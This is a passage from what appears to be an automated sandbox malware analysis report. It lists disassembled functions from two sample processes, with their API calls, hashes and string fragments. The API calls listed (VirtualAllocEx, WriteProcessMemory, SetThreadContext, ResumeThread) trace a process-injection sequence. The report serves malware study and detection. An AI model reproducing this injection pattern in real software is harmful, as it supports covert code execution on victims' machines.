Instruction Fuzzy Hash: D5916AB0D0061ACFEB14CF68C841BEDBBF2BF48314F148669E809A7244DB759985CF95

Function 053818E4 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05381A02

Memory Dump Source

Source File: 0000000A.00000002.2585947624.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5380000_bQrgcvrrXfGN.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 4e310dc05d1fc177e660b49c11c3abb818f9e662e849f5b4408c8458b12a6a71
Instruction ID: 921fccea3cd3bc2c8bba48474596b195f8bd1377530af69f2bd71acdb2044986
Opcode Fuzzy Hash: 4e310dc05d1fc177e660b49c11c3abb818f9e662e849f5b4408c8458b12a6a71
Instruction Fuzzy Hash: 1451E3B5D00349DFDB14CFA9C884ADEFBB5BF48310F24852AE819AB210D7B49985CF90

Function 053818F0 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05381A02

Memory Dump Source

Source File: 0000000A.00000002.2585947624.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5380000_bQrgcvrrXfGN.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 2f8312c6f0e5f0f1ccbb94e0c1e49577c9dcbf544c92a718b8f94e3f54247239
Instruction ID: e8a7226b8f87e917f2e6231018826991bb86e9434c293b0a1a614f69c053bc51
Opcode Fuzzy Hash: 2f8312c6f0e5f0f1ccbb94e0c1e49577c9dcbf544c92a718b8f94e3f54247239
Instruction Fuzzy Hash: 3441B1B5D10349DFDB14DF99D884ADEFBB5BF88310F24812AE819AB210D7B49985CF90

Function 011344C4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 011359A9

Memory Dump Source

Source File: 0000000A.00000002.2582115660.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1130000_bQrgcvrrXfGN.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1089b048bd9096d6338c44d9eee99b6d610d852fafc84e2ea72c0a8c09ae0612
Instruction ID: 3ee2344ef22af86d95e62deac265becf23367795303d8e9e56d9cb4c28cd7967
Opcode Fuzzy Hash: 1089b048bd9096d6338c44d9eee99b6d610d852fafc84e2ea72c0a8c09ae0612
Instruction Fuzzy Hash: 0641F570C0071DCBEB24DFAAC84478DBBB6BF89704F10816AD409BB255D7756946CF90

Function 05384040 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05384101

Memory Dump Source

Source File: 0000000A.00000002.2585947624.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5380000_bQrgcvrrXfGN.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 2bd3266fe131ee19fab009c7d8b813f6746f6e383f8ad08fb2b6c2714fb30f00
Instruction ID: 7be89563d6a9a0bae23d6fb241801e3ff29bb7128f8cc3d66b38f11abda21f59
Opcode Fuzzy Hash: 2bd3266fe131ee19fab009c7d8b813f6746f6e383f8ad08fb2b6c2714fb30f00
Instruction Fuzzy Hash: BC411AB4A00309CFDB14DF99C848AAAFBF5FB88314F25C559D519AB721D374A845CFA0

Function 07075D68 Relevance: 1.6, APIs: 1, Instructions: 74
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07075E00

Memory Dump Source

Source File: 0000000A.00000002.2587195103.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7070000_bQrgcvrrXfGN.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: aa1e88b107a9cefbabd904196b79d09d5692e7ba412fd2d8e34e7f36479dbda8
Instruction ID: 4cbc9950cf87548dd5b84e7c46c67c48568f1055254d0f6d06f7105b78491b3b
Opcode Fuzzy Hash: aa1e88b107a9cefbabd904196b79d09d5692e7ba412fd2d8e34e7f36479dbda8
Instruction Fuzzy Hash: 803145B5D00349DFDB10DFA9C884BDEBBF0BF48310F10892AE969A7250D7789954CBA4

Function 07075D70 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07075E00

Memory Dump Source

Source File: 0000000A.00000002.2587195103.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7070000_bQrgcvrrXfGN.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 1fb49cb9656ea644eed8de3002f65729c3ee6bf050ace00ba2ec857b6cf8aeb7
Instruction ID: ae6e66b0b408b3bce480b2131e64c79282c7c379399d520bcf3ae9e865598551
Opcode Fuzzy Hash: 1fb49cb9656ea644eed8de3002f65729c3ee6bf050ace00ba2ec857b6cf8aeb7
Instruction Fuzzy Hash: 002125B1D003499FDB10DFA9C884BDEBBF5FF48310F10892AE919A7240D7789954CBA4

Function 07075798 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0707581E

Memory Dump Source

Source File: 0000000A.00000002.2587195103.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7070000_bQrgcvrrXfGN.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c3136cd7a106ddebac84bdf5dd5b48a6142d5c1861705c71ce68485152cd2445
Instruction ID: 3c2e77d9b0c87949eddb61efce7571f8e6e863cd3e85b19891cfd971dfeb09ba
Opcode Fuzzy Hash: c3136cd7a106ddebac84bdf5dd5b48a6142d5c1861705c71ce68485152cd2445
Instruction Fuzzy Hash: E82165B1D002098FDB10CFAAD884BEEBBF4AF88310F14852AD419B7240D7789A45CFA4

Function 07075E5A Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07075EE0

Memory Dump Source

Source File: 0000000A.00000002.2587195103.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7070000_bQrgcvrrXfGN.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: d5241845ac2dc4ceba2a2d6b7930751219e7d838e97612ece9fbee6f7734896a
Instruction ID: 1687f59614214ad1df1c8a0fbe39f029db8b8c5854c4e8b8922c377c78dfaa30
Opcode Fuzzy Hash: d5241845ac2dc4ceba2a2d6b7930751219e7d838e97612ece9fbee6f7734896a
Instruction Fuzzy Hash: 372145B5C002499FDB10CFA9D880BEEBBF5BF48310F14892AE518A7250C7789954CBA4

Function 070757A0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0707581E

Memory Dump Source

Source File: 0000000A.00000002.2587195103.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7070000_bQrgcvrrXfGN.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: f1ce24be8bc88ffb6f5f1c6ad5d25c2351925b5d48c3ddc721ed348c63217aa6
Instruction ID: ff5513c9725c0fadb28973b110243d31d42081503e68a78ce443f15e32f6d8d9
Opcode Fuzzy Hash: f1ce24be8bc88ffb6f5f1c6ad5d25c2351925b5d48c3ddc721ed348c63217aa6
Instruction Fuzzy Hash: C1215BB1D003098FDB50DFAAC8847EEBBF4EF88314F14852AD519A7240D7789945CFA5

Function 07075E60 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07075EE0

Memory Dump Source

Source File: 0000000A.00000002.2587195103.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7070000_bQrgcvrrXfGN.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 95753b4f643b71bf51d54798a585a573e472141566522be1a85d693fc1775edc
Instruction ID: 968fc9e48b76c3c72a327b9d9c5fc5b54bd3de39f7b5a1327fb44687e7729e3c
Opcode Fuzzy Hash: 95753b4f643b71bf51d54798a585a573e472141566522be1a85d693fc1775edc
Instruction Fuzzy Hash: D02159B1C003499FDB10DFAAC880BDEBBF4FF48310F50852AE518A7240C7799900CBA4

Function 0113D5D0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0113D657

Memory Dump Source

Source File: 0000000A.00000002.2582115660.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1130000_bQrgcvrrXfGN.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c907b9f6589cc2aecf6fdc61cde373f27d1fd3fde375256cbd25f66267ce78b7
Instruction ID: 940a31cabc7832bdd44585929214c57927066c2806134e813030896945fa3e08
Opcode Fuzzy Hash: c907b9f6589cc2aecf6fdc61cde373f27d1fd3fde375256cbd25f66267ce78b7
Instruction Fuzzy Hash: 1221C4B5D00249DFDB10CFAAD984ADEBBF5EB48310F54841AE918B3350D378A954CFA5

Function 0113D5CF Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0113D657

Memory Dump Source

Source File: 0000000A.00000002.2582115660.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1130000_bQrgcvrrXfGN.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a33fca3b2a6a58e91ad16672f5c07414bdaf9a1cc80fddd24ebd588824727cd0
Instruction ID: 71e11a1f6c602cc8a667da551d46a7162b3f41aa55c31ded1c18573a912fbc2b
Opcode Fuzzy Hash: a33fca3b2a6a58e91ad16672f5c07414bdaf9a1cc80fddd24ebd588824727cd0
Instruction Fuzzy Hash: 5721C2B5D00249DFDB10CFAAD984ADEBBF5EB48310F14841AE918B3350D378A954CFA5

Function 0113A070 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0113AFB9,00000800,00000000,00000000), ref: 0113B1CA

Memory Dump Source

Source File: 0000000A.00000002.2582115660.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1130000_bQrgcvrrXfGN.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 11b3dc3a13df948424c782a4bd53b8f2eaab223b80b0d80ca473280d4a572995
Instruction ID: b163a4a1604fa5875d3b9ca7316ef77b95a328698e7da39408e81fbf69e688c8
Opcode Fuzzy Hash: 11b3dc3a13df948424c782a4bd53b8f2eaab223b80b0d80ca473280d4a572995
Instruction Fuzzy Hash: ED1117B6D042498FDB14CF9AD844B9EFBF4EB88710F10842AD519A7210D3B9A545CFA9

Function 070756E8 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07075752

Memory Dump Source

Source File: 0000000A.00000002.2587195103.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7070000_bQrgcvrrXfGN.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ebd96d4d4d5f853299403995e267f47fc5aae8517b82a22f58d5f6cde7684f58
Instruction ID: 0c5516d52d4b705227620a56d679a796d1aee6fcf337f4949eeecc4447fe3c6a
Opcode Fuzzy Hash: ebd96d4d4d5f853299403995e267f47fc5aae8517b82a22f58d5f6cde7684f58
Instruction Fuzzy Hash: F31158B5D00249CFDB10DFA9D9447EFBBF5AB88310F24891AD519B7240C778A645CFA4

Function 07075CA8 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07075D1E

Memory Dump Source

Source File: 0000000A.00000002.2587195103.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7070000_bQrgcvrrXfGN.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 21f61f5799ac651d56c67375c150c0c50b1e3f86fd62255453e4cc16cc94fa9b
Instruction ID: 677f44c0054ed90fd65ac182fa49ef97499b71bd4600d371bacfa8eb465cac59
Opcode Fuzzy Hash: 21f61f5799ac651d56c67375c150c0c50b1e3f86fd62255453e4cc16cc94fa9b
Instruction Fuzzy Hash: 4E117975D00209CFDB10DFA9D8487DEBBF5BF88314F14881AE515A7250C7799951CFA4

Function 0113B15F Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0113AFB9,00000800,00000000,00000000), ref: 0113B1CA

Memory Dump Source

Source File: 0000000A.00000002.2582115660.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1130000_bQrgcvrrXfGN.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ef71448c8f61157e0263ff4129c5e72a0134b7b8ac0ecebae77c72c305566d4f
Instruction ID: 89d509cd7be25e33d6617490d6dd036f0e51217df68756acf8091d137044531f
Opcode Fuzzy Hash: ef71448c8f61157e0263ff4129c5e72a0134b7b8ac0ecebae77c72c305566d4f
Instruction Fuzzy Hash: 491123B6C002098FDB14CF9AD944BDEFBF4AB88310F14842AD519B7200D378A545CFA4

Function 070756F0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07075752

Memory Dump Source

Source File: 0000000A.00000002.2587195103.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7070000_bQrgcvrrXfGN.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3e7293cc23f2902d4126f1677ebf5f15e4f3f93b46e5b7dcfa1cb14e2f4e8be0
Instruction ID: fc3f28002a3a1ca8b962483161801c09a66fb461fbef2fdd14d6e3a345fa32a1
Opcode Fuzzy Hash: 3e7293cc23f2902d4126f1677ebf5f15e4f3f93b46e5b7dcfa1cb14e2f4e8be0
Instruction Fuzzy Hash: 811166B1D00349CFDB10DFAAD8447DEFBF4AF88310F24881AC519A7240C779A944CBA4

Function 07079A48 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07079AAD

Memory Dump Source

Source File: 0000000A.00000002.2587195103.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7070000_bQrgcvrrXfGN.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 8c66b3c0b10251bb7b039bfc67398fe93e3810ed8bf060c57be8205501c41418
Instruction ID: 2c14e0920e37d6f4b7310603fdb792e054d05a4050f55e4ed343abbd80f9b5d0
Opcode Fuzzy Hash: 8c66b3c0b10251bb7b039bfc67398fe93e3810ed8bf060c57be8205501c41418
Instruction Fuzzy Hash: 631133B6C00249DFDB10DFA9D945BDEBBF8EB48320F14840AD458B3210C379A984CFA5

Function 07076058 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07079AAD

Memory Dump Source

Source File: 0000000A.00000002.2587195103.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7070000_bQrgcvrrXfGN.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 48fd7e8414b5ac45f2307bdc1adc651f15e2dadac0581e7fc7647ce9738d4c63
Instruction ID: 17a1d7ce8c9160874f47e42e3c03f630b69d0be2ae6857b53851cda226f161a6
Opcode Fuzzy Hash: 48fd7e8414b5ac45f2307bdc1adc651f15e2dadac0581e7fc7647ce9738d4c63
Instruction Fuzzy Hash: 9A1133B5C00349EFDB10DF9AD845BDEBBF8EB48310F10851AE958A7210C379A944CFA5

Function 0113AED8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0113AF3E

Memory Dump Source

Source File: 0000000A.00000002.2582115660.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1130000_bQrgcvrrXfGN.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ee1c5588573cb7ba98c35ef164bbca14bef1d962550c5d053a31ba74d00832bc
Instruction ID: fe6cf26beb5d245bf70e6a9da3505fea93e469bfe151d080b61f59d1279eb33f
Opcode Fuzzy Hash: ee1c5588573cb7ba98c35ef164bbca14bef1d962550c5d053a31ba74d00832bc
Instruction Fuzzy Hash: D51140B6C006498FDB14CF9AD444BCEFBF8AF88314F10842AD958B3250C378A545CFA1

Function 0113AED7 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0113AF3E

Memory Dump Source

Source File: 0000000A.00000002.2582115660.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1130000_bQrgcvrrXfGN.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 260974d76fb1c1bb87e966eaad9bc8774e1a0f55dab186ea3d5c4631738bfcd5
Instruction ID: e4e22ef12215275955e6594a151c42f21904485a010744db3b68305404cb33d8
Opcode Fuzzy Hash: 260974d76fb1c1bb87e966eaad9bc8774e1a0f55dab186ea3d5c4631738bfcd5
Instruction Fuzzy Hash: 041140B6C00649CFDB14CF9AD544BDEFBF4AF88214F10841AC558B3250C378A545CFA1

Function 07075CB0 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07075D1E

Memory Dump Source

Source File: 0000000A.00000002.2587195103.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7070000_bQrgcvrrXfGN.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d8e70a53d78b1e08bedb57eb519696e6e18c14d64b9e7dfdd7e1b6325849365c
Instruction ID: 34abbba7c722fefe4097b11a2beb17ed9d73dfa40127125cf97d3def03c56cd9
Opcode Fuzzy Hash: d8e70a53d78b1e08bedb57eb519696e6e18c14d64b9e7dfdd7e1b6325849365c
Instruction Fuzzy Hash: AA0135B08003499FDB10DFAAC848BDFBFF5AF48314F108819E518A6250C7799540CBA5

Function 010BD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2581973392.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10bd000_bQrgcvrrXfGN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 819df79f96af7d99df6b148df241e6708a9587c6c4064d10cac7fc6ec4b235ef
Instruction ID: b33b3b01a1e508238d9b844edb5f1e0c30f4b2cffe8a30aa9cad748c8292c0e3
Opcode Fuzzy Hash: 819df79f96af7d99df6b148df241e6708a9587c6c4064d10cac7fc6ec4b235ef
Instruction Fuzzy Hash: 0A214871500204DFDB05DF58D9C0B9AFFA5FB88318F24C5ADE94A0B256C73AE446CBA1

Function 010BD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2581973392.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10bd000_bQrgcvrrXfGN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abce57805455fbad13e0e183dbad104b38b4f6e941f47554a424b7e7f7ae1c1d
Instruction ID: f69105567798b3da40b96d07d28abe389d284b755ee3dfa53712624d2ec90bd5
Opcode Fuzzy Hash: abce57805455fbad13e0e183dbad104b38b4f6e941f47554a424b7e7f7ae1c1d
Instruction Fuzzy Hash: 8E11CD72404240CFCB02CF44D5C0B96BFA1FB84324F2486A9D8490A256C33AE45ACBA2

Function 010BD759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2581973392.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10bd000_bQrgcvrrXfGN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e99d766ed742c1e05cbe2e93a778edf91c40391497d13b681c1978cdb5c0e9c
Instruction ID: 8082f375e20134732565ecf44bb8a325daef181c2724e742f60330dc73ace411
Opcode Fuzzy Hash: 3e99d766ed742c1e05cbe2e93a778edf91c40391497d13b681c1978cdb5c0e9c
Instruction Fuzzy Hash: 84012B31044380DAE7604B59CCD4BEAFFD8FF41328F18845AEE490A286E3399840C7B1

Function 010BD758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2581973392.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10bd000_bQrgcvrrXfGN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd125b3c52963445dc53e39595de610dd3d0ff4683140af9077bb3d68f70ac17
Instruction ID: b7ee6926097bb5aadb6f5418cffaa4d43357498386e0ae4c73afe6a08d3d8a82
Opcode Fuzzy Hash: cd125b3c52963445dc53e39595de610dd3d0ff4683140af9077bb3d68f70ac17
Instruction Fuzzy Hash: C7F0C8714043849EE7108E09CCC4BA2FFE8FF40624F18C45AED481A286D3799844CB71

Analysis Process: JBOkmqufMEGwlAXNwkIjNoQeH.exePID: 3784, Parent PID: 6256COMMON

Executed Functions

Function 03B50E96 Relevance: 68.1, Strings: 54, Instructions: 574COMMON

Download Yara Rule

Strings

o, xrefs: 03B50F8D
E, xrefs: 03B51458
}, xrefs: 03B511AB
~, xrefs: 03B50FA2
DA, xrefs: 03B50F68
t, xrefs: 03B51107
z/, xrefs: 03B50EC7
HN, xrefs: 03B513A0
cd, xrefs: 03B5108B
0, xrefs: 03B50F0C
vH, xrefs: 03B51426
O+, xrefs: 03B50EDC
!, xrefs: 03B510DD
TN, xrefs: 03B51190
6, xrefs: 03B513D6
), xrefs: 03B50F3E
_, xrefs: 03B50F7C
X:, xrefs: 03B50ECE
/j, xrefs: 03B512A8
f, xrefs: 03B51300
l}, xrefs: 03B5129A
%5, xrefs: 03B51332
s,, xrefs: 03B50FD8
:, xrefs: 03B51059
9, xrefs: 03B51B9B
"_, xrefs: 03B51933
@, xrefs: 03B5112F
Un, xrefs: 03B51143
w^, xrefs: 03B512B6
TI, xrefs: 03B512AF
3tcd, xrefs: 03B51663
T, xrefs: 03B5111B
;8, xrefs: 03B512A1
YR, xrefs: 03B51267
!z, xrefs: 03B51168
'V, xrefs: 03B51209
\o, xrefs: 03B51444
), xrefs: 03B51063
3I, xrefs: 03B50FA9
7, xrefs: 03B510B5
3h, xrefs: 03B5138C
5n, xrefs: 03B5191B
h, xrefs: 03B511FF
*, xrefs: 03B5117C
0, xrefs: 03B51346
4, xrefs: 03B513F4
V, xrefs: 03B50F48
cF, xrefs: 03B51462
^, xrefs: 03B51378
:, xrefs: 03B513C2
_', xrefs: 03B50F52
L>, xrefs: 03B50FE2
eE, xrefs: 03B5115E
', xrefs: 03B50FF6

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID: }$!$!z$"_$%5$'$'V$)$)$/j$0$0$3I$3h$3tcd$4$5n$6$7$:$:$;8$@$DA$HN$L>$O+$T$TI$TN$Un$V$X:$YR$\o$^$_$_'$cF$cd$eE$f$h$l}$o$s,$t$vH$w^$z/$*$9$E$~
API String ID: 0-2066194266
Opcode ID: 61c15323eb2ac5e75d2b3b893dfc1f09bb3461e2360e551cea0f7588f1ae855c
Instruction ID: 073b5156e9bc579ca3770c2d7dbcd0869dd79189aa9913f34c55d731265a472f
Opcode Fuzzy Hash: 61c15323eb2ac5e75d2b3b893dfc1f09bb3461e2360e551cea0f7588f1ae855c
Instruction Fuzzy Hash: 3E727DB0D05269CBEF68CF48C9997DDBBB1BB45308F1081D9D5096B280DBB95AC9CF84

Function 03B5E9A0 Relevance: 6.4, Strings: 5, Instructions: 152COMMON

Download Yara Rule

Strings

6, xrefs: 03B5EA2D
\, xrefs: 03B5EA34
s, xrefs: 03B5EA1F
O, xrefs: 03B5EA26
S, xrefs: 03B5EA18

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID: 6$O$S$\$s
API String ID: 0-3854637164
Opcode ID: 957f0770ece005ac44945c6c02a66444c88469d3589f9a1ca4b1d4096ad4e2de
Instruction ID: 6d575c0464c2f103a0981203d49b05f42d55bd903dd76be8e37924bcfd5eb5ad
Opcode Fuzzy Hash: 957f0770ece005ac44945c6c02a66444c88469d3589f9a1ca4b1d4096ad4e2de
Instruction Fuzzy Hash: 1841A7B2D01219ABDB10EBA49D49FEBB3B8EB48318F0441E5ED099A100E775AB148B91

Function 03B6B0E6 Relevance: 2.5, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

Dw,, xrefs: 03B6B155, 03B6B158
:, xrefs: 03B6B133

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID: :$Dw,
API String ID: 0-3155023940
Opcode ID: 433c68f727d85a49ffe3ccadb3b9cb447971c0824f4436f8989212fdebee3b7f
Instruction ID: a64e0b83ed81259e4ef976c57e47e049ae99af00f19e612dcb3cd3e96edbfc82
Opcode Fuzzy Hash: 433c68f727d85a49ffe3ccadb3b9cb447971c0824f4436f8989212fdebee3b7f
Instruction Fuzzy Hash: 0701D7B6D0121CAFCB40DFE8D9419EEBBF8AB08204F1482AAD915F6200E7715A048BA5

Function 03B6C3A6 Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

t6, xrefs: 03B6C3E9

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

